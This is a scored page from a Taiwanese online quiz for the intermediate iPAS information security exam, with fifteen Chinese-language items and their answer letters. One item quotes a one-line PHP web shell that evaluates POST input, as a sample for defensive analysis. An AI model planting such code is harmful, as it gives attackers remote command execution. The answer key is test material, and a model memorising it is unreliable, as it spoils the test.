阿摩:只有想不到的事,沒有做不到的事。
100
(1 分32 秒)
模式:精熟測驗
科目:iPAS◆資訊安全防護實務◆中級
 繼續測驗
再次測驗 下載 下載收錄
1(D).

題組:
 某公司為了符合國際標準要求,將年度定期舉行之滲透測試( Penetration Test, PT )作業,委由外部資安檢測團隊 X 來進行。 
根據上列資訊,請回答下列問題:

【題組】40. 題組背景描述如附圖。檢測團隊 X 最終依照計畫如期完成公司測試 案,並交付測試報告,關於滲透測試報告,下列敘述何者正確?
(A) 滲透測試報告主要目的為提升組織合規性與其適法性,並能有效 促進商業行為發展
(B) 滲透測試報告弱點分級通常使用緊急( Emergency )、急迫 ( Urgent )、一般( Standard )、普通( Normal )
(C) 為提升滲透測試可讀性,對於安全弱點技術細節應考量精簡或忽 略,並詳述問題改善與修復方案
(D) 滲透測試報告使高階管理人員更易於決策安全措施之執行,也協 助資安單位順利修復弱點與實踐安全控制



2(A).

【題組】39. 題組背景描述如附圖。檢測團隊 X 測試公司網站,發現可竄改傳遞至 應用程式之 XML 內容引入特定資源並回應其內容,再透過此漏洞列 舉網站伺服器其中 Web 目錄,其中含有不尋常 PHP 檔案內容如下: <?php eval($_POST[‘cmd’] ) >。關於檔案內容,下列敘述何者「不」正確?
(A) 檔案推測為「一句話木馬」但無需理會,因其內容可顯示所以無 法被網站伺服器執行
(B) 檢測團隊第一時間於網站所發現之漏洞類型為本地文件包含漏洞 ( Local File Inclusion, LFI )
(C) 檔案可能為遭受攻擊者所植入的後門程式( Web-Shell ),又常被 稱為「一句話木馬」
(D) 檢測團隊第一時間所發現之漏洞可能透過 XML 外部實體( XML External Entity, XXE )進行注入攻擊



3(A).

【題組】38. 題組背景描述如附圖。滲透測試分三階段「攻擊前( Pre-Attack )」、「攻 擊中( Attack )」與「攻擊後( Post-Attack )」。檢測團隊 X 欲執行主動 式偵查( Active Reconnaissance )而透過網際網路對受測目標使用掃瞄 器,探測目標網路邊界、網路服務與其應用程式資訊,此行為屬於下 列何種階段?
(A) 「攻擊前( Pre-Attack )」
(B) 「攻擊前( Pre-Attack )」與「攻擊中( Attack )」
(C) 「攻擊中( Attack )」
(D) 「攻擊後( Post-Attack )」



4(D).

題組:
 對於公司內部資安維運而言,資安漏洞或弱點的修補常是重要的工作,收 到漏洞或弱點通報後,資安人員常依據漏洞或弱點之嚴重性,加上公司本 身是否為漏洞或弱點影響範圍等資訊,來決定漏洞或弱點修補的優先性, 以避免公司遭受更大的資安危害,A 公司係屬我國資通安全管理法所規範 之“特定非公務機關”,且被主管機關核定資安責任等級為 A 級,對日常 資安漏洞的修補投入許多心力。 
根據上列資訊,請回答下列問題:
33. 題組背景描述如附圖。某日 A 公司內部資安人員收到一則漏洞資安通 報資訊如附圖,關於內容中通用漏洞評分系統( Common Vulnerability Scoring System, CVSS ),下列敘述何者「不」正確?5f3ce88869cb7.jpg 
(A) CVSS 的分數愈高,代表這個漏洞的嚴重等級愈高
(B) CVSS 的評分基準中,會考量這個漏洞已被公開的天數
(C) CVSS 的評分基準中,會考量這個漏洞或弱點在使用時,所需擁 有的權限等級( Privileges Required )
(D) CVSS 的分數滿分為 10 分

【題組】34. 題組背景描述如附圖。承上題,關於這則漏洞通報(如附圖)中所揭 露的訊息,下列敘述何者正確?
(A) 通報內容有揭露此一漏洞的公布日期
(B) 通報內容沒有揭露受此一漏洞所影響的產品與版本
(C) 通報內容有揭露受此一漏洞所影響的產品、版本與解決方案
(D) 通報內容有揭露受此一漏洞所會造成的影響或弱點類型



5(A).

題組:
免費憑證組織 Let's Encrypt,於 2019 年 2 月 27 日,宣佈該組織所頒發的免 費憑證數量,已正式突破 10 億大關,該組織發佈免費憑證的目的是為了協 助網站業者啟用 HTTPS 加密傳輸,由於該組織的大力協助使得全球啟用 HTTPS 的網頁數量已達到 81%,美國更高達 91%,有效提升全球使用 HTTPS 的普及率。 
根據上列資訊,請回答下列問題:

【題組】31. 題組背景描述如附圖。若想用 openssl 的指令完成產生並儲存自簽伺服 器憑證,下列指令何者正確?
(A) openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout selfsigned.key -out selfsigned.crt
(B) openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout selfsigned.key
(C) openssl req -x509 -days 365 -newkey rsa:2048 -keyout selfsigned.key -out selfsigned.crt
(D) openssl generatekey -x509 -nodes -days 365 -newkey rsa:2048 -keyout selfsigned.key -out selfsigned.crt



6(C).

【題組】30. 題組背景描述如附圖。關於 Let's Encrypt 及其機制,下列敘述何者「不」 正確?
(A) Let's Encrypt 是一家全球性的憑證頒發機構( Certificate Authority, CA )
(B) 所頒發的憑證有效期限較傳統 CA 短
(C) Let's Encrypt 協助確認網站的身份,有效避免詐欺與釣魚
(D) 可將憑證用在任何使用域名的服務上,如:網頁伺服器、郵件伺 服器和 FTP 伺服器



7(A).

題組:
某公司為軟體系統開發商,主要業務為協助客戶進行客製化軟體系統之開 發,若您為公司資安官,負責公司所有資訊安全之防護與管理事宜,公司 近期剛通過第三方之 ISO/IEC 27001 驗證,範圍包含:系統開發與機房管 理、機房納管設備包含網路設備、防火牆、官網伺服器、檔案伺服器、防 毒伺服器以及資料庫伺服器。 
根據上列資訊,請回答下列問題:

【題組】23. 題組背景描述如附圖。為了機房能夠正常提供納管設備之運作,避免 某些因素而導致機房中斷服務,下列何種控制措施較為正確?
(A) 機房增加不斷電系統
(B) 各伺服器均定期更新病毒碼
(C) 網路設備變更預設出廠值
(D) 防火牆設定合適參數



8(A,B,C).

19. 關於入侵偵測系統( Intrusion Detection System )與入侵防護系統 ( Intrusion Prevention System )之應用,下列敘述何者正確?(複選)
(A) 入侵偵測系統透過旁接模式( TAP or SPAN Mode )或將特定網路 介面設定為混雜模式( Promiscuous Mode ),來取得監聽網路之流 量副本
(B) TAP 和 SPAN Mode 之差異在於前者透過硬體 1:1 複製流量至分 接網路介面;而後者透過軟體轉送流量副本至目的網路介面並可 能因其容量限制而造成封包遺失
(C) 如欲阻擋網路攻擊,入侵防護系統需設置為串連模式( In-line Mode )才能於攻擊傳遞過程中攔截
(D) 入侵防護系統除偵測各式網路攻擊外也能進行阻擋,對於分散式 阻斷服務攻擊(Distributed Denial-of-Service, DDoS )之阻擋成效 尤其明顯



9(A,C,D).

18. 關於網站應用程式中之跨網站指令碼攻擊( Cross-Site Scripting, XSS ),下列敘述何者正確?(複選)
(A) 跨網站指令碼攻擊分為反射式( Reflected )、儲存式( Stored )與 檔案物件模型( Document Object Model )
(B) 跨網站指令碼攻擊僅能透過 JavaScript 執行
(C) 儲存式跨網站指令碼攻擊通常被置入於資料庫,並於受害者所瀏 覽特定功能、頁面後執行
(D) 反射式跨網站指令碼攻擊將惡意資料透過瀏覽器對網站的請求 ( Request )送出後,於受害者瀏覽之功能、頁面執行



10(A,C).

16. 企業發生勒索軟體感染事件後,在下列哪些安全維運的記錄中可以找 到線索進行判斷事件規模?(複選)
(A) SIEM
(B) OS Application Event Log
(C) AntiVirus Detection Log
(D) SNMP Log



11(C).

11. 關於優良保密協定( Pretty Good Privacy, PGP ),下列敘述何者「不」 正確?
(A) 使用 IDEA 的演算法作為加密驗證之用
(B) 支援訊息的身份認證和完整性檢查
(C) 使用了公鑰基礎設施( PKI )進行身份的鑑別( Authentication )
(D) 同時做用了對稱式金鑰( Symmetric Key )加密與非對稱金鑰 ( Asymmetric Key )加密



12(D).

8. 關於集線器( Hub ),下列敘述何者「不」正確?
(A) 為開放式系統互聯模型( Open System Interconnection Model, OSI ) 中,實體層( Physical Layer )的設備
(B) 駭客可利用介接此設備監聽網路封包
(C) 進入到任一埠( Port )的封包,都會被廣播到其他 Port
(D) 可用來區隔廣播領域( Broadcast domain )



13(A).

4. 在網站弱點檢測報告中,發現系統存在路徑竄改( Path Manipulation ) 問題時,可以採取下列何種方案進行修補?
(A) 可以使用白名單路徑跟黑名單危險字串
(B) 可以採用圖像式驗證即可根治
(C) HTML.Encode
(D) Prepared Statement



14(C).

題組:一位資安專家正在對內部網站進行連接埠掃描,使用工具為 Nmap,伺服 器 IP 為 10.0.1.1,掃描後看到的結果如下:5f3ce829f2ed3.jpg根據上列資訊,請回答下列問題:


【題組】28. 題組背景描述如附圖。若要提升 POP3 服務的安全性,應使用下列何 種協定及連接埠?
(A) POP3s, 443
(B) POP3s, 1443
(C) POP3s, 995
(D) POP3s, 110



15(B,C,D).

17. 關於源碼檢測與滲透測試,下列敘述何者正確?(複選)
(A) 滲透測試的使用時機通常會在程式開發過程中分次執行,而源碼 檢測常會在系統開發完成後才使用
(B) SQL Injection 的問題,不論是執行源碼檢測或滲透測試,都是有 機會可以被發現
(C) XSS 的問題只會出現在可執行 JavaScript 的環境中
(D) Google Hacking 常與滲透測試搭配使用,用以蒐集待測網站的資 訊與漏洞



最頂
快捷工具
完全正確!

精熟測驗 - iPAS◆資訊安全防護實務◆中級-阿摩線上測驗

喬剛剛做了阿摩測驗,考了100分